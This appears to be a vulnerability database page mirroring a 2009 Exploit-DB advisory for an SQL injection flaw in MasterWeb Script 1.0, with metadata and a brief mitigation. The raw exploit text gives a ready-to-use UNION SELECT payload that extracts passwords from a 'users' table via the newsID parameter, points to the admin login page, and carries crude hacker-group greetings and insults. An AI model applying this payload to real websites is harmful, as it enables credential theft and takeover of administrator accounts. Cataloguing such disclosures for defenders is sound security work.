MasterWeb Script - exploit.company

vendor:

MasterWeb Script

by:

./Red-D3v1L

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: MasterWeb Script

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:masterweb-ps:masterweb_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: ASP

2009

MasterWeb Script <== 1.0 (details&newsID) SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in MasterWeb Script 1.0 by sending malicious SQL queries to the application. This can allow the attacker to gain access to sensitive information stored in the database, such as user credentials, or even modify the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _           
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ / 
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   /
              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+

    [?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
    [?] MasterWeb Script <== 1.0 (details&newsID) SQL Injection Vulnerability
==============================================================================
    [?] My home:              [ http://sec-r1z.com ]
    [?] Script:               [ MasterWeb Script 1.0 ]
    [?] Language:             [ ASP ]
    [?] Vendor                [http://masterweb-ps.com/]
    [?] Founder:              [ ./Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
    [?] Fuck To :             [ Zombie_KsA << big big big L4m3r ] 
########################################################################
  
===[ Exploit SQL ]===
  
[ª]SQL : [Path]/details&newsID=[inj3ct C0dE]
 
[ª]dem0:
 
http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users

Admin:[Path]/admin/login.asp

==============================================================================

#sEc-r1z.com Str1kEz y0u !